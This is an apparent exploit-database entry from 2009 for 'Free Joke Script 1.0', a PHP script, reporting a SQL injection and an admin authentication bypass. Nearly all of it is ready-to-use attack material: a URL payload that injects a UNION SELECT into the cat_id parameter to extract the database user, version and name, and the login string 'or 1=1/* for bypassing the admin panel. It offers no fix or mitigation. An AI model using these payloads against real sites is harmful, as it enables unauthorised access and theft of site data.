Free Joke Script 1.0 - Authentication Bypass

漏洞ID 1057452
发布时间 2009-02-12 更新时间 2009-02-12
漏洞平台 PHP
# freejokesscript = 1.0 (joke-archives.php) remote sql injection vulnerability & admin bypass vulnerability 

# author : MuhaciR aka гламурный подонок

# source :

# license price : $20 per copy

# sql:[jokes path if any]/joke-archives.php?cat_name=muhacir&cat_id=15+union+select+1,concat(user(),0x3a,version(),0x3a,database()),3,4,5/*

# admin bypas: simply enter 'or 1=1/* at login. no filtration

# [2009-02-12]